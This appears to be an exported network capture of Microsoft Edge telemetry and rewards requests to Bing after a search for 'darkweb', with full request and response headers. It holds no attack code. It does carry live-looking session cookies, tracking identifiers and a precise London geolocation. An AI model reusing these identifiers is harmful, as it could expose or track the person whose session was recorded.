useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-zWBsh1PsUVKm12ysQ74GaONnrYnhQJhz4vzigYeMHaM='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
x-ceto-ref: 67502a3c25514760a59b80da438b831a|AFD:67502a3c25514760a59b80da438b831a|2024-12-04T10:09:00.720Z
date: Wed, 04 Dec 2024 10:09:00 GMT
set-cookie: _C_ETH=1; domain=.bing.com; path=/; secure; httponly
set-cookie: _C_Auth=
set-cookie: _RwBf=r=0&ilt=3&ihpd=0&ispd=3&rc=9&rb=0&gb=0&rg=200&pc=6&mtu=0&rbb=0&g=0&cid=&clo=0&v=3&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:09:00.7411999+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; domain=.bing.com; expires=Thu, 04-Dec-2025 10:09:00 GMT; path=/; secure; SameSite=None
set-cookie: _Rwho=u=d&ts=2024-12-04; domain=.bing.com; path=/; secure; HttpOnly; SameSite=None
set-cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=9&RB=0&GB=0&RG=200&RP=6; domain=.bing.com; path=/; secure; SameSite=None
set-cookie: bm_sv=; domain=.bing.com; expires=Thu, 01-Jan-1970 08:00:00 GMT; path=/; secure; SameSite=None
set-cookie: bm_sv=; expires=Thu, 01-Jan-1970 08:00:00 GMT; path=/; secure; SameSite=None
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306940.7f1e39d
GET

https://www.bing.com/fd/ls/l?IG=202035EC43B64C3DBF7FE10F53408EC5&TYPE=Event.ClientInst&DATA=%5B%7B%22comp%22%3A%22loaded%22%2C%22time%22%3A1278%2C%22T%22%3A%22CI.Data%22%2C%22TS%22%3A1733306931651%2C%22Name%22%3A%22speech%22%2C%22FID%22%3A%22HP%22%7D%5D

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /fd/ls/l?IG=202035EC43B64C3DBF7FE10F53408EC5&TYPE=Event.ClientInst&DATA=%5B%7B%22comp%22%3A%22loaded%22%2C%22time%22%3A1278%2C%22T%22%3A%22CI.Data%22%2C%22TS%22%3A1733306931651%2C%22Name%22%3A%22speech%22%2C%22FID%22%3A%22HP%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=darkweb&qs=n&form=QBRE&sp=-1&ghc=1&lq=0&pq=darkweb&sc=10-7&sk=&cvid=6AB2CD56EF6C4338BF41C655438BDF1B&ghsh=0&ghacc=0&ghpl=
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:49.6106115+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=6&RB=0&GB=0&RG=200&RP=3
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100849
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb
cookie: bm_sv=F97CC3009A6FB08FD2D5AF48B8560EFC~YAAQTTZ6XAypT4iTAQAAWfgkkRq87VQXMtfSo820qO8DIocM89HFA7LHK81PkKU5u8kxoF0QQ3/O1xtdpc8ymqRGlr73zajjkFgnVjQWJ5Qs6RX4kJ8wtYIGYJ4H77p2pPEdOLlA4JyUyJaQ4BfYGO2sIHhMFWvAN8gyjpTZSyy9biamhWUXdjHOIaqe0B+bFexn+OzubKhGK7/WfXS1/Mw5pH2IDespPJL9wivyM1cVSudxg+iseyb21jSe2A==~1
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3469&DPR=1.0&UTC=0&PV=10.0&EXLTT=2&HV=1733306921&WTS=63868903693&PRVCW=1280&PRVCH=601

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Wed, 04 Dec 2024 10:09:01 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306941.7f1e5d4
GET

https://www.bing.com/fd/ls/l?IG=202035EC43B64C3DBF7FE10F53408EC5&TYPE=Event.ClientInst&DATA=%5B%7B%22micComponent%22%3A%22rendered%22%2C%22time%22%3A1279%2C%22T%22%3A%22CI.Data%22%2C%22TS%22%3A1733306931652%2C%22Name%22%3A%22speech%22%2C%22FID%22%3A%22HP%22%7D%5D

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /fd/ls/l?IG=202035EC43B64C3DBF7FE10F53408EC5&TYPE=Event.ClientInst&DATA=%5B%7B%22micComponent%22%3A%22rendered%22%2C%22time%22%3A1279%2C%22T%22%3A%22CI.Data%22%2C%22TS%22%3A1733306931652%2C%22Name%22%3A%22speech%22%2C%22FID%22%3A%22HP%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=darkweb&qs=n&form=QBRE&sp=-1&ghc=1&lq=0&pq=darkweb&sc=10-7&sk=&cvid=6AB2CD56EF6C4338BF41C655438BDF1B&ghsh=0&ghacc=0&ghpl=
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:49.6106115+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=6&RB=0&GB=0&RG=200&RP=3
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100849
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb
cookie: bm_sv=F97CC3009A6FB08FD2D5AF48B8560EFC~YAAQTTZ6XAypT4iTAQAAWfgkkRq87VQXMtfSo820qO8DIocM89HFA7LHK81PkKU5u8kxoF0QQ3/O1xtdpc8ymqRGlr73zajjkFgnVjQWJ5Qs6RX4kJ8wtYIGYJ4H77p2pPEdOLlA4JyUyJaQ4BfYGO2sIHhMFWvAN8gyjpTZSyy9biamhWUXdjHOIaqe0B+bFexn+OzubKhGK7/WfXS1/Mw5pH2IDespPJL9wivyM1cVSudxg+iseyb21jSe2A==~1
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3469&DPR=1.0&UTC=0&PV=10.0&EXLTT=2&HV=1733306921&WTS=63868903693&PRVCW=1280&PRVCH=601

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Wed, 04 Dec 2024 10:09:01 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306941.7f1e626
POST

https://www.bing.com/rewardsapp/ncheader?ver=51619320&IID=SERP.5054&IG=202035EC43B64C3DBF7FE10F53408EC5

msedge.exe

Remote address:

95.101.143.203:443

Request

POST /rewardsapp/ncheader?ver=51619320&IID=SERP.5054&IG=202035EC43B64C3DBF7FE10F53408EC5 HTTP/2.0
host: www.bing.com
content-length: 4
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
content-type: application/x-www-form-urlencoded
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=darkweb&qs=n&form=QBRE&sp=-1&ghc=1&lq=0&pq=darkweb&sc=10-7&sk=&cvid=6AB2CD56EF6C4338BF41C655438BDF1B&ghsh=0&ghacc=0&ghpl=
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _C_Auth=
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:49.6106115+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=6&RB=0&GB=0&RG=200&RP=3
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100849
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb
cookie: bm_sv=F97CC3009A6FB08FD2D5AF48B8560EFC~YAAQTTZ6XAypT4iTAQAAWfgkkRq87VQXMtfSo820qO8DIocM89HFA7LHK81PkKU5u8kxoF0QQ3/O1xtdpc8ymqRGlr73zajjkFgnVjQWJ5Qs6RX4kJ8wtYIGYJ4H77p2pPEdOLlA4JyUyJaQ4BfYGO2sIHhMFWvAN8gyjpTZSyy9biamhWUXdjHOIaqe0B+bFexn+OzubKhGK7/WfXS1/Mw5pH2IDespPJL9wivyM1cVSudxg+iseyb21jSe2A==~1
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3469&DPR=1.0&UTC=0&PV=10.0&EXLTT=2&HV=1733306921&WTS=63868903693&PRVCW=1280&PRVCH=601

Response

HTTP/2.0 204

access-control-allow-origin: *
date: Wed, 04 Dec 2024 10:09:01 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306941.7f1e634
POST

https://www.bing.com/rewardsapp/reportActivity?IG=202035EC43B64C3DBF7FE10F53408EC5&IID=SERP.5063&q=darkweb&qs=n&form=QBRE&sp=-1&ghc=1&lq=0&pq=darkweb&sc=10-7&sk=&cvid=6AB2CD56EF6C4338BF41C655438BDF1B&ghsh=0&ghacc=0&ghpl=

msedge.exe

Remote address:

95.101.143.203:443

Request

POST /rewardsapp/reportActivity?IG=202035EC43B64C3DBF7FE10F53408EC5&IID=SERP.5063&q=darkweb&qs=n&form=QBRE&sp=-1&ghc=1&lq=0&pq=darkweb&sc=10-7&sk=&cvid=6AB2CD56EF6C4338BF41C655438BDF1B&ghsh=0&ghacc=0&ghpl= HTTP/2.0
host: www.bing.com
content-length: 215
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
content-type: application/x-www-form-urlencoded
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=darkweb&qs=n&form=QBRE&sp=-1&ghc=1&lq=0&pq=darkweb&sc=10-7&sk=&cvid=6AB2CD56EF6C4338BF41C655438BDF1B&ghsh=0&ghacc=0&ghpl=
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _C_Auth=
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:49.6106115+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=6&RB=0&GB=0&RG=200&RP=3
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100849
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb
cookie: bm_sv=F97CC3009A6FB08FD2D5AF48B8560EFC~YAAQTTZ6XAypT4iTAQAAWfgkkRq87VQXMtfSo820qO8DIocM89HFA7LHK81PkKU5u8kxoF0QQ3/O1xtdpc8ymqRGlr73zajjkFgnVjQWJ5Qs6RX4kJ8wtYIGYJ4H77p2pPEdOLlA4JyUyJaQ4BfYGO2sIHhMFWvAN8gyjpTZSyy9biamhWUXdjHOIaqe0B+bFexn+OzubKhGK7/WfXS1/Mw5pH2IDespPJL9wivyM1cVSudxg+iseyb21jSe2A==~1
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3469&DPR=1.0&UTC=0&PV=10.0&EXLTT=2&HV=1733306921&WTS=63868903693&PRVCW=1280&PRVCH=601

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Wed, 04 Dec 2024 10:09:01 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306941.7f1e612
GET

https://www.bing.com/fd/ls/l?IG=202035EC43B64C3DBF7FE10F53408EC5&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.FeedbackInit%22,%22FID%22:%22CI%22,%22Name%22:%22Feedback%22,%22Text%22:%22fdbkans_0%22}]

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /fd/ls/l?IG=202035EC43B64C3DBF7FE10F53408EC5&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.FeedbackInit%22,%22FID%22:%22CI%22,%22Name%22:%22Feedback%22,%22Text%22:%22fdbkans_0%22}] HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=darkweb&qs=n&form=QBRE&sp=-1&ghc=1&lq=0&pq=darkweb&sc=10-7&sk=&cvid=6AB2CD56EF6C4338BF41C655438BDF1B&ghsh=0&ghacc=0&ghpl=
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100849
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=3&ihpd=0&ispd=3&rc=9&rb=0&gb=0&rg=200&pc=6&mtu=0&rbb=0&g=0&cid=&clo=0&v=3&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:09:00.7411999+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=9&RB=0&GB=0&RG=200&RP=6
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3469&DPR=1.0&UTC=0&PV=10.0&EXLTT=3&HV=1733306921&WTS=63868903693&PRVCW=1280&PRVCH=601

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Wed, 04 Dec 2024 10:09:01 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306941.7f1e664
GET

https://www.bing.com/fd/ls/l?IG=202035EC43B64C3DBF7FE10F53408EC5&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.FeedbackInit%22,%22FID%22:%22CI%22,%22Name%22:%22Feedback%22,%22Text%22:%22thumb_tum13%22}]

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /fd/ls/l?IG=202035EC43B64C3DBF7FE10F53408EC5&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.FeedbackInit%22,%22FID%22:%22CI%22,%22Name%22:%22Feedback%22,%22Text%22:%22thumb_tum13%22}] HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=darkweb&qs=n&form=QBRE&sp=-1&ghc=1&lq=0&pq=darkweb&sc=10-7&sk=&cvid=6AB2CD56EF6C4338BF41C655438BDF1B&ghsh=0&ghacc=0&ghpl=
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
